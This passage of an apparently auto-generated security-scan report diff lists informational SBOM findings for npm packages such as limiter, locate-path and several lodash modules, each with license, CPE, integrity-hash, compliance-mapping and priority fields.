"javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lilconfig:lilconfig:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lilconfig@3.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lilconfig/-/lilconfig-3.1.3.tgz", + "integrity": "sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "90dd10f1ec21efdc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: limiter 1.1.5", + "title": "limiter 1.1.5", + "description": "Package discovered: limiter 1.1.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7ebb3add1191948c", + "name": "limiter", + "version": "1.1.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:limiter:limiter:1.1.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/limiter@1.1.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/limiter/-/limiter-1.1.5.tgz", + "integrity": "sha512-FWWMIEOxz3GwUI4Ts/IvgVy6LPvoMPgjMdQ185nN6psJyBJ4yOpzqm695/h5umdLJg2vW3GR5iG11MAkR2AzJA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8108350690a84b91", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: linebreak 1.1.0", + "title": "linebreak 1.1.0", + "description": "Package discovered: linebreak 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "17b9850959841637", + "name": "linebreak", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:linebreak:linebreak:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/linebreak@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/linebreak/-/linebreak-1.1.0.tgz", + "integrity": "sha512-MHp03UImeVhB7XZtjd0E4n6+3xr5Dq/9xI/5FptGk5FrbDR3zagPa2DS6U8ks/3HjbKWG9Q1M2ufOzxV2qLYSQ==", + "dependencies": { + "base64-js": "0.0.8", + "unicode-trie": "^2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6d22d8e100269548", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lines-and-columns 1.2.4", + "title": "lines-and-columns 1.2.4", + "description": "Package discovered: lines-and-columns 1.2.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2f4d4f332c0f6687", + "name": "lines-and-columns", + "version": "1.2.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lines-and-columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines-and-columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines_and_columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines_and_columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines-and:lines-and-columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines-and:lines_and_columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines_and:lines-and-columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines_and:lines_and_columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines:lines-and-columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lines:lines_and_columns:1.2.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lines-and-columns@1.2.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", + "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "99a30188145ce555", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: locate-path 5.0.0", + "title": "locate-path 5.0.0", + "description": "Package discovered: locate-path 5.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e6b383b17df8c845", + "name": "locate-path", + "version": "5.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:locate-path:locate-path:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:locate-path:locate_path:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:locate_path:locate-path:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:locate_path:locate_path:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:locate:locate-path:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:locate:locate_path:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/locate-path@5.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dependencies": { + "p-locate": "^4.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4752919bcee27237", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash 4.18.1", + "title": "lodash 4.18.1", + "description": "Package discovered: lodash 4.18.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ac9c211256bf6980", + "name": "lodash", + "version": "4.18.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash:lodash:4.18.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/lodash@4.18.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz", + "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "89713df98a2beb75", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.camelcase 4.3.0", + "title": "lodash.camelcase 4.3.0", + "description": "Package discovered: lodash.camelcase 4.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a5b985768ef9b9f6", + "name": "lodash.camelcase", + "version": "4.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.camelcase:lodash.camelcase:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.camelcase@4.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", + "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4b1d67018d50050d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.clonedeep 4.5.0", + "title": "lodash.clonedeep 4.5.0", + "description": "Package discovered: lodash.clonedeep 4.5.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1fdd3c59e36d5b0f", + "name": "lodash.clonedeep", + "version": "4.5.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.clonedeep:lodash.clonedeep:4.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.clonedeep@4.5.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz", + "integrity": "sha512-H5ZhCF25riFd9uB5UCkVKo61m3S/xZk1x4wA6yp/L3RFP6Z/eHH1ymQcGLo7J3GMPfm0V/7m1tryHuGVxpqEBQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6ee3a377a52860b5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.defaults 4.2.0", + "title": "lodash.defaults 4.2.0", + "description": "Package discovered: lodash.defaults 4.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "59a8c664dfef6c46", + "name": "lodash.defaults", + "version": "4.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lodash.defaults:lodash.defaults:4.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lodash.defaults@4.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz", + "integrity": "sha512-qjxPLHd3r5DnsdGacqOMU6pb/avJzdh9tFX2ymgoZE27BmjXrNy/y4LoaiTeAb+O3gL8AfpJGtqfX/ae2leYYQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a3b4683fdc629aef", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lodash.includes 4.3.0", + "title": "lodash.includes 4.3.0", + "description": "Package discovered: lodash.includes 4.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "aa93a44741b08e66", + "name": "lodash.includes", + "version": "4.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + 